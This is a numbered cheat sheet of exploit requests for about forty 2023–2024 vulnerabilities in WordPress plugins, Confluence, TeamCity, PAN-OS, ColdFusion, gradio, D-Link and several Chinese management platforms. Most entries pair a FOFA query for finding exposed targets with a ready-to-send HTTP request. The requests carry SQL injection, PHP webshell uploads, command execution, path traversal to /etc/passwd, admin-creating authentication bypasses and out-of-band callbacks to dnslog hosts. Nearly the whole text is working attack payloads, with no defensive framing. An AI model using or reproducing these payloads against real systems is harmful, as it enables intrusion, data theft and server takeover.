Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo (Byzoro) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo (Byzoro) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo (Byzoro) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan Engineering Quality Inspection System arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the back end directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
5 v8 L( a& G) {) P9 g6 M7 @<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Back-end address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
